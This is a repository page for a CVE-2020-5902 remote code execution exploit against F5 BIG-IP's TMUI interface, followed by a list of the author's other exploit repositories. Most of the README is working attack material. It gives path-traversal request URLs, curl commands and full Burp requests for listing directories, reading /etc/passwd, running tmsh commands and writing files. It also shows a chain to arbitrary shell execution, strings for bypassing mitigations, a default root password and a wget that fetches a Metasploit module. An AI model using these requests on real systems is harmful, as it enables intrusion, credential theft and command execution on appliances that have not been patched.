• Stars
    star
    376
  • Rank 113,187 (Top 3 %)
  • Language
    Java
  • Created about 4 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2020-5902 BIG-IP

CVE-2020-5902 BIG-IP RCE

Update Use /hsqldb%0a/ Bypass Rules For Java Deserialization

or /hsqld%b > /hsqldb;

/tmui/login.jsp/..;/hsqldb

<LocationMatch ".*\.\.;.*">
Redirect 404 /
</LocationMatch>

bypass /hsqldb;

<LocationMatch ";">
Redirect 404 /
</LocationMatch>

bypass /hsqldb%0a

include 'FileETag MTime Size
<LocationMatch ";">
Redirect 404 /
</LocationMatch>
<LocationMatch "hsqldb">
Redirect 404 /
</LocationMatch>
'

fix:
https://support.f5.com/csp/article/K52145254

use python for hsqldb

use java for hsqldb

https://github.com/Critical-Start/Team-Ares/blob/master/CVE-2020-5902/f5RCE.java

asciicast

Use Python

BIGIP vmware ova

╭─root@kali /var/www/html/big_ip 
╰─# md5sum *
ce16d114fc4d04f087e6ebc4cfac89a9  BIGIP-14.1.2.6-0.0.2.ALL-vmware.ova
b57614da7bdacdd76c14546bd910add5  BIGIP-15.1.0-0.0.31.ALL-vmware.ova

#### Console Default Password

https://www.question-defense.com/2011/03/28/f5-big-ip-ltm-ve-default-login-big-ip-local-traffic-manager-virtual-edition-console-login

`root/default` 

poc

https://twitter.com/x4ce/status/1279790599793545216

RCE: 
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'

Read File: 
curl -v -k  'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'

0x00 List File

/tmui/locallb/workspace/directoryList.jsp

Example:

directoryPath=/usr/local/www/

BurpSuite Request

GET /tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=65ACC6C79B31335D71E4F432DB39EA50
Connection: close
Upgrade-Insecure-Requests: 1


BurpSuite Response

      {
        "dir": "tmui",
        "children": [
          {
            "dir": "WEB-INF",
            "children": [
              {
                "dir": "classes",
                "children": [
                  {
                    "dir": "org",
                    "children": [
                      {
                        "dir": "apache",
                        "children": [
                          {
                            "dir": "jsp",
                            "children": [
                              {
                                "dir": "common",
                                "children": [
                                  {
                                    "file": "deleteconfirm_jsp.class"
  
                                      ............................

0x01 Read File

Example:

/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

BurpSuite Requests

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


BurpSuite Response

{
  "output": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\ntmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin\nadmin:x:0:500:Admin User:/home/admin:/sbin/nologin\nvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin\ndbus:x:81:81:System message bus:/:/sbin/nologin\npostgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin\nf5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin\noprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin\ntcpdump:x:72:72::/:/sbin/nologin\nrpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin\nhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin\napache:x:48:48:Apache:/usr/local/www:/sbin/nologin\ntomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin\nmysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin\nnamed:x:25:25:Named:/var/named:/bin/false\nqemu:x:107:107:qemu user:/:/sbin/nologin\nsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin\nsdm:x:498:495:sdmuser:/var/sdm:/bin/false\nntp:x:38:38::/etc/ntp:/sbin/nologin\nsyscheck:x:199:10::/:/sbin/nologin\nrestnoded:x:198:198::/:/sbin/nologin\ntwister5:x:0:500:twister5:/home/twister5:/bin/bash\n"
}

format

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
tmshnobody:x:32765:32765:tmshnobody:/:/sbin/nologin
admin:x:0:500:Admin User:/home/admin:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/local/pgsql/data:/sbin/nologin
f5_remoteuser:x:499:499:f5 remote user account:/home/f5_remoteuser:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
apache:x:48:48:Apache:/usr/local/www:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat:/sbin/nologin
mysql:x:98:98:MySQL server:/var/lib/mysql:/sbin/nologin
named:x:25:25:Named:/var/named:/bin/false
qemu:x:107:107:qemu user:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
sdm:x:498:495:sdmuser:/var/sdm:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
twister5:x:0:500:twister5:/home/twister5:/bin/bash

0x02 RCE (execute arbitrary system commands)

Example:

/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

list auth user look all user

list auth user admin only look admin user

https://devcentral.f5.com/s/question/0D51T00006i7hq9/tmsh-command-to-list-all-users-in-all-partitions

GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


{
  "error": "",
  "output": "auth user admin {\n    description \"Admin User\"\n    encrypted-password $6$bEhBobYGG3$zmQ.k2Yw4E3iOAJu1jDIrE.LClSUq6xdLyNTvgDy14FIeDsxdnwAxkxUlpSQ7F60Y3tzKsUAKz.2qRtPLa.dx1\n    partition Common\n    partition-access {\n        all-partitions {\n            role admin\n        }\n    }\n    shell tmsh\n}\n"
}

format

    description "Admin User"
    encrypted-password $6$bEhBobYGG3$zmQ.k2Yw4E3iOAJu1jDIrE.LClSUq6xdLyNTvgDy14FIeDsxdnwAxkxUlpSQ7F60Y3tzKsUAKz.2qRtPLa.dx1
    partition Common
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell tmsh
}

WorkspaceUtils.runTmshCommand

JSONObject resultObject = WorkspaceUtils.runTmshCommand(cmd, request);

/usr/local/www/tmui/WEB-INF/lib/tmui.jar/com.f5.tmui.locallb.handler.workspace.WorkspaceUtils#runTmshCommand

  public static JSONObject runTmshCommand(String command, HttpServletRequest request) {
    F5Logger logger = (F5Logger)F5Logger.getLogger(WorkspaceUtils.class);
    JSONObject resultObject = new JSONObject();
    String output = "";
    String error = "";
    if (!csrfValidated(request.getHeader("_bufvalue"), request.getHeader("_timenow"), request.getHeader("Tmui-Dubbuf"))) {
      logger.warn("Invalid user token - token provided by user is not authorized");
      resultObject.put("output", output);
      resultObject.put("error", NLSEngine.getString("ilx.workspace.error.InvalidUserToken"));
      return resultObject;
    } 
    if ("POST".equalsIgnoreCase(request.getMethod())) {
      String[] cmdArray = command.split(" ");
      String operation = cmdArray[0];
      String module = cmdArray[2];
      if (!ShellCommandValidator.checkForBadShellCharacters(command) && (operation.equals("create") || operation.equals("delete") || operation.equals("list") || operation.equals("modify")) && WHITELISTED_TMSH_MODULES.contains(module)) {
        try {
          String[] args = { command };
          Syscall.Result result = Syscall.callElevated(Syscall.TMSH, args);
          output = result.getOutput();
          error = result.getError();
        } catch (com.f5.tmui.util.Syscall.CallException e) {
          logger.error(NLSEngine.getString("ilx.workspace.error.TmshCommandFailed") + ": " + e.getMessage());
          error = e.getMessage();
        } 
      } else {
        error = NLSEngine.getString("ilx.workspace.error.RejectedTmshCommand");
      } 
    } else {
      error = NLSEngine.getString("ilx.workspace.error.InvalidMethod");
    } 
    resultObject.put("output", output);
    resultObject.put("error", error);
    return resultObject;
  }

0x03 Upload File

Example: /tmui/locallb/workspace/fileSave.jsp

POST: fileName=/tmp/1.txt&content=CVE-2020-5902

Burpsuite Requests

POST /tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

fileName=/tmp/1.txt&content=CVE-2020-5902



HTTP/1.1 200 OK
Date: Mon, 06 Jul 2020 02:05:29 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=16070400; includeSubDomains
Set-Cookie: JSESSIONID=x; Path=/tmui; Secure; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Vary: Accept-Encoding
Content-Length: 4
Connection: close







File Read /tmp/1.txt

GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/1.txt HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


HTTP/1.1 200 OK
Date: Mon, 06 Jul 2020 02:06:07 GMT
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=16070400; includeSubDomains
Set-Cookie: JSESSIONID=x; Path=/tmui; Secure; HttpOnly
Content-Type: text/html;charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'  'unsafe-inline' 'unsafe-eval' data: blob:; img-src 'self' data:  http://127.4.1.1 http://127.4.2.1
Vary: Accept-Encoding
Content-Length: 32
Connection: close





{"output":"CVE-2020-5902\n"}

upload /tmp/1.txt Successful !

0x04 MSF f5_bigip_tmui_rce

https://github.com/rapid7/metasploit-framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

msf use

wget -P /usr/share/metasploit-framework/modules/exploits/linux/http/ https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb

reload_all

exploit/linux/http/f5_bigip_tmui_rce 2020-06-30 excellent Yes F5 BIG-IP TMUI Directory Traversal and File Upload RCE

╭─root@kali ~ 
╰─# msfconsole 
                                                  
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2007 exploits - 1096 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to check out the result of hosts and services

msf5 > reload_all 
[*] Reloading modules from all module paths...
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2007 exploits - 1096 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again

msf5 > search f5_bigip

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/dos/http/f5_bigip_apm_max_sessions                     normal     No     F5 BigIP Access Policy Manager Session Exhaustion Denial of Service
   1  auxiliary/gather/f5_bigip_cookie_disclosure                      normal     No     F5 BigIP Backend Cookie Disclosure
   2  auxiliary/scanner/http/f5_bigip_virtual_server                   normal     No     F5 BigIP HTTP Virtual Server Scanner
   3  exploit/linux/ssh/f5_bigip_known_privkey        2012-06-11       excellent  No     F5 BIG-IP SSH Private Key Exposure
   4  exploit/linux/http/f5_bigip_tmui_rce            2020-06-30       excellent  Yes    F5 BIG-IP TMUI Directory Traversal and File Upload RCE


msf5 > 

tmshCmd.jsp + fileSave.jsp = Linux RCE

1. tmshCmd.jsp?command=create+cli+alias+private+list+command+bash
2. fileSave.jsp?fileName=/tmp/cmd&content=id
3. tmshCmd.jsp?command=list+/tmp/cmd
4. tmshCmd.jsp?command=delete+cli+alias+private+list

More Repositories

1

0day-security-software-vulnerability-analysis-technology

0day安全_软件漏洞分析技术
C
547
star
2

IDA_Pro_7.2

IDA_Pro_7.2
Shell
487
star
3

oracleShell

oracle 数据库命令执行
439
star
4

Log4j2-CVE-2021-44228

Remote Code Injection In Log4j
434
star
5

Grafana-CVE-2021-43798

Grafana Unauthorized arbitrary file reading vulnerability
Go
329
star
6

St2-057

St2-057 Poc Example
Shell
314
star
7

CVE-2019-13272

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root
C
301
star
8

CVE-2020-14882

CVE-2020–14882、CVE-2020–14883
277
star
9

CVE-2019-1388

CVE-2019-1388 UAC提权 (nt authority\system)
174
star
10

cve-2019-2618

Weblogic Upload Vuln(Need username password)-CVE-2019-2618
Python
170
star
11

OA-tongda-RCE

Office Anywhere网络智能办公系统
PHP
146
star
12

CVE-2019-3396

Confluence 未授权 RCE (CVE-2019-3396) 漏洞
Python
146
star
13

ncDecode

用友nc数据库密码解密
138
star
14

CVE-2018-17182

Linux 内核VMA-UAF 提权漏洞(CVE-2018-17182),0day
C
129
star
15

gitlab-SSRF-redis-RCE

GitLab 11.4.7 SSRF配合redis远程执行代码
Shell
120
star
16

2018-QWB-CTF

2018强网杯CTF___题目整理
Python
114
star
17

fuzz-wooyun-org

WooYun Fuzz 库
PHP
107
star
18

solr_rce

Apache Solr RCE via Velocity template
Python
104
star
19

OA-Seeyou

note
Java
104
star
20

CVE-2019-12409

Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")
Python
103
star
21

CVE-2019-11580

CVE-2019-11580 Atlassian Crowd and Crowd Data Center RCE
Python
101
star
22

CVE-2018-2628

Weblogic 反序列化漏洞(CVE-2018-2628)
Python
101
star
23

CVE-2019-12384

Jackson Rce For CVE-2019-12384
Ruby
98
star
24

SpringBoot_Actuator_RCE

SpringBoot_Actuator_RCE
96
star
25

CVE-2019-11043

php-fpm+Nginx RCE
Python
96
star
26

CVE-2019-11581

Atlassian JIRA Template injection vulnerability RCE
91
star
27

kibana-RCE

kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609
90
star
28

CVE-2019-0193

Apache Solr DataImport Handler RCE
Python
89
star
29

CVE-2020-8193

Citrix ADC Vulns
Python
85
star
30

CVE-2019-19781

Citrix ADC Remote Code Execution
Python
83
star
31

CVE-2020-2551

Weblogic RCE with IIOP
82
star
32

e-cology

e-cology OA_Beanshell_RCE
Java
80
star
33

zentao-getshell

禅道8.2 - 9.2.1前台Getshell
Python
79
star
34

CVE-2019-7238

Nexus Repository Manager 3 Remote Code Execution without authentication < 3.15.0
Python
77
star
35

jackson-CVE-2020-8840

FasterXML/jackson-databind 远程代码执行漏洞
Java
76
star
36

Redis-RCE

remote code execute for redis4 and redis5
Python
73
star
37

FinalShellDecodePass

FinalShellDecodePass 加密解密
Java
73
star
38

SHIRO-721

RememberMe Padding Oracle Vulnerability RCE
71
star
39

xxl-job

xxl-job RESTful API RCE
70
star
40

CVE-2019-0232

Apache Tomcat Remote Code Execution on Windows - CGI-BIN
Python
69
star
41

CVE-2019-16278

Directory transversal to remote code execution
Shell
69
star
42

Ubuntu-0day

all 4.4 ubuntu aws instances are vulnerable
C
66
star
43

CVE-2018-3191

Weblogic-CVE-2018-3191远程代码命令执行漏洞
Python
63
star
44

fastjson-RCE

fastjson-1.2.47
62
star
45

CVE-2019-2888

WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)
Java
59
star
46

Shiro_Xray

CommonsBeanutils1,CommonsCollectionsK1
Python
58
star
47

CVE-2019-15107

CVE-2019-15107 Webmin RCE (unauthorized)
Python
57
star
48

St2-052

St2-052
56
star
49

cve-2018-1273

Spring Data Commons RCE 远程命令执行漏洞
Python
56
star
50

CVE-2019-11510-1

SSL VPN Rce
Python
54
star
51

GitlabVer

gitlab version index
Shell
52
star
52

SHIRO-550

Shiro RememberMe 1.2.4 反序列化 漏洞
Python
52
star
53

webuploader-0.1.15-Demo

webuploader-v-0.1.15未授权-任意文件上传
52
star
54

BurpSuite_Pro_v1.7.37

Java
51
star
55

CVE-2020-17008

CVE-2020-17008 splWOW64 Elevation of Privilege
51
star
56

DBconfigReader

泛微ecology OA系统接口存在数据库配置信息泄露漏洞
50
star
57

SqlMap_BurpSuite

SqlMap_BurpSuite
Java
44
star
58

msfconsole-termux

How To Install Metasploit-Table on the Android Termux
Shell
42
star
59

CVE-2019-2890

CVE-2019-2890 WebLogic 反序列化RCE漏洞
41
star
60

cs_yara

check cs yara rules
YARA
40
star
61

st2-048

st2-048
Python
40
star
62

spring-ENC

sprint encode (plan text) get enc password
Java
39
star
63

mssql-command-tool

mssql 终端连接工具|命令执行
Go
38
star
64

BurpSuite-Plugin

Plugin For BurpSuite (Pentester)
JavaScript
38
star
65

fastjson-1.2.60-rce

autoType enable
36
star
66

Burp_AES_Plugin

Burpsuite Plugin For AES Crack
Java
35
star
67

mimikat_ssp

Security Support Provider Interface
C++
35
star
68

ThinkCMF_getshell

ThinkCMF 框架上的任意内容包含漏洞
Python
35
star
69

CVE-2020-10199

CVE-2020-10199、CVE-2020-10204、CVE-2020-11444
35
star
70

ChromePluginCrx

离线安装Chrome插件-插件备份
33
star
71

JWT_Brute

JWT_Brute
32
star
72

CVE-2020-1947

Apache ShardingSphere UI YAML解析远程代码执行漏洞
32
star
73

CVE-2019-15642

Webmin Remote Code Execution (authenticated)
Python
32
star
74

fastjson-1.2.61-RCE

fastjson-1.2.61-RCE
Java
32
star
75

CVE-2019-8451

Jira未授权SSRF漏洞
Python
31
star
76

fastjson-1.2.58-rce

fastjson-1.2.58-rce with h2 database
Java
31
star
77

Fortify_Rule

Decode Fortify Rule Bin File Get XML File
Java
29
star
78

CVE-2020-26259

CVE-2020-26259: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights.
Java
28
star
79

IDA7.0-Pro

some people share IDA7.0!
25
star
80

S2-045-EXP-POC-TOOLS

S2-045 漏洞 POC-TOOLS CVE-2017-5638
Python
25
star
81

OpenFire_Decrypt

OpenFire 管理后台账号密码解密
Java
24
star
82

njRAT-0.7

远控工具Njrat
24
star
83

CVE-2018-14847

MikroTik RouterOS Winbox未经身份验证的任意文件读/写漏洞
Python
24
star
84

CVE-2019-20197

Nagios XI远程命令执行漏洞 <v5.6.9
23
star
85

CVE-2019-16759

vBulletin 5.x 未授权远程代码执行漏洞
Python
22
star
86

st2-046-poc

st2-046-poc CVE-2017-5638
Shell
22
star
87

Jboss_JMXInvokerServlet_Deserialization_RCE

Jboss_JMXInvokerServlet_Deserialization_RCE
21
star
88

CVE-2019-10392

CVE-2019-10392 RCE Jackson with Git Client Plugin 2.8.2 (Authenticated)
21
star
89

CVE-2018-10933

libssh CVE-2018-10933
Python
20
star
90

010-Editor-Template

20
star
91

Java-Compressed-file-security

java web 压缩文件 安全 漏洞
Python
19
star
92

Vmware_vCenter

VMware vCenter(Unauthenticated)
18
star
93

PHPStudy-Backdoor

phpstudy dll backdoor for v2016 and v2018
PHP
18
star
94

CVE-2019-3394

Confluence(<install-directory>/confluence/WEB-INF/)文件读取漏洞
17
star
95

CTF-RSA-tool

CTF-RSA-tool
C
17
star
96

Security_Article

scrapy website Article and link ...
HTML
17
star
97

Hscan

Hscan-Win-Gui
Python
16
star
98

CVE-2018-2894

Weblogic,CVE-2018-2894
Python
16
star
99

BurpSuite-icns

制作BurpSuite icns 在Mac OS上
16
star
100

phpweb

phpweb 前台任意文件上传
16
star